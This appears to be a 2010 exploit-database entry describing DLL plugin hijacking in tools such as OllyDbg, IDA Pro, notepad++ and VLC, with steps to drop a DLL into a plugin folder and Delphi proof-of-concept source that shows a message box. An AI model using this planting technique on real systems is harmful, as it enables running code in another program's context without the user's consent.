Lucene search
K

Plugins Dll Hijacking Exploit

🗓️ 08 Sep 2010 00:00:00Reported by STRELiTZIAType 
zdt
 zdt
🔗 0day.today👁 18 Views

Plugins Dll Hijacking Exploit allows malicious code execution in targeted application context without user consent. Test.dll link available. Applications tested: FastScanner, ExeInfoPE, Stud_PE, PE Explorer, OllyDbg, IDA Pro, notepad++, Hex Workshop, Foxit Reader, PhotoFiltre Studio X, VLC Media player, Import REConstructor, PE Tools by NEOx, DiE- DETECT iT EASY

Code
=============================
Plugins Dll Hijacking Exploit
=============================

Exploit Title: [Dll Hijacking Exploit]
Application: [Application plugin support]
Date: [07 Sept 2010]
Author: [STRELiTZIA]
Version: [%Applications list%]
Tested on: [Windows Xp, Vista, Windows 7]

Description: 
------------
Allows other applications dynamic link libraries to execute malicious code without the users consent,
in the privilege context of the targeted application.
 
Download Test.dll link ()
 
Applications list: (Tested)
-----------------
FastScanner
ExeInfoPE
Stud_PE
PE Explorer
OllyDbg
IDA Pro (*.plw)
notepad++
Hex Workshop
Foxit Reader
PhotoFiltre Studio X
VLC Media player
Import REConstructor
PE Tools by NEOx
DiE- DETECT iT EASY 
 
Instructions:
-------------
1- Copy "Test.dll" into "Application\%plugin%"

Perform this tests:
-------------------
- Launch Application.

Test Dll Delphi Source:
---//---
Library Test;
uses
  Windows;

begin
  MessageBoxA
    (
    0,
    PChar('Yep, I''m running in your system without your permission :)'),
	PChar('Sample'),
    MB_ICONSTOP
    );
end.
---//---
c) 2010 by STRELiTZIA.



#  0day.today [2018-03-05]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation